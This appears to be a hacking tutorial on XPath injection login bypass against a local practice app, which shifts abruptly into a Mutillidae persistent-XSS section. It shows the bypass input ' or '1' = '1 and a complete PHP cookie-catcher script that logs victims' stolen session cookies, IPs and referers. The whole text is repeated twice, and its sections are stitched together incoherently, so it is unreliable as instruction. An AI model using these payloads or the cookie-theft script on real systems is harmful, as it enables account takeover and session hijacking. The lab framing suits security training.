XPATH INJECTION TUTORIAL
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )
Sample XML Document which we gonna use:-
<Employees>
<!-- Employees Database -->
<Employee ID="1">
<FirstName>Johnny</FirstName>
<LastName>Bravo</LastName>
<UserName>jbravo</UserName>
<Password>test123</Password>
<Type>Admin</Type>
</Employee>
<Employee ID="2">
<FirstName>Mark</FirstName>
<LastName>Brown</LastName>
<UserName>mbrown</UserName>
<Password>demopass</Password>
<Type>User</Type>
</Employee>
<Employee ID="3">
<FirstName>William</FirstName>
<LastName>Gates</LastName>
<UserName>wgates</UserName>
<Password>MSRocks!</Password>
<Type>User</Type>
</Employee>
<Employee ID="4">
<FirstName>Chris</FirstName>
<LastName>Dawes</LastName>
<UserName>cdawes</UserName>
<Password>letmein</Password>
<Type>User</Type>
</Employee>
</Employees>
Bypass Authentication:-
Browse to the login.php page; here we can see simple login form.
Bypass Authentication
If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:
Username: ' or '1' = '1
Password: ' or '1' = '1
Bypass Authentication using XPATH injection
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
Authentication Bypass
Privilege Escalation
Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.
Using cookie
Using brute-force
Using SQL injection
(1)Authentication Bypass Using Cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )
Sample XML Document which we gonna use:-
<Employees>
<!-- Employees Database -->
<Employee ID="1">
<FirstName>Johnny</FirstName>
<LastName>Bravo</LastName>
<UserName>jbravo</UserName>
<Password>test123</Password>
<Type>Admin</Type>
</Employee>
<Employee ID="2">
<FirstName>Mark</FirstName>
<LastName>Brown</LastName>
<UserName>mbrown</UserName>
<Password>demopass</Password>
<Type>User</Type>
</Employee>
<Employee ID="3">
<FirstName>William</FirstName>
<LastName>Gates</LastName>
<UserName>wgates</UserName>
<Password>MSRocks!</Password>
<Type>User</Type>
</Employee>
<Employee ID="4">
<FirstName>Chris</FirstName>
<LastName>Dawes</LastName>
<UserName>cdawes</UserName>
<Password>letmein</Password>
<Type>User</Type>
</Employee>
</Employees>
Bypass Authentication:-
Browse to the login.php page; here we can see simple login form.
Bypass Authentication
If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:
Username: ' or '1' = '1
Password: ' or '1' = '1
Bypass Authentication using XPATH injection
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
Authentication Bypass
Privilege Escalation
Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.
Using cookie
Using brute-force
Using SQL injection
(1)Authentication Bypass Using Cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
.jpg)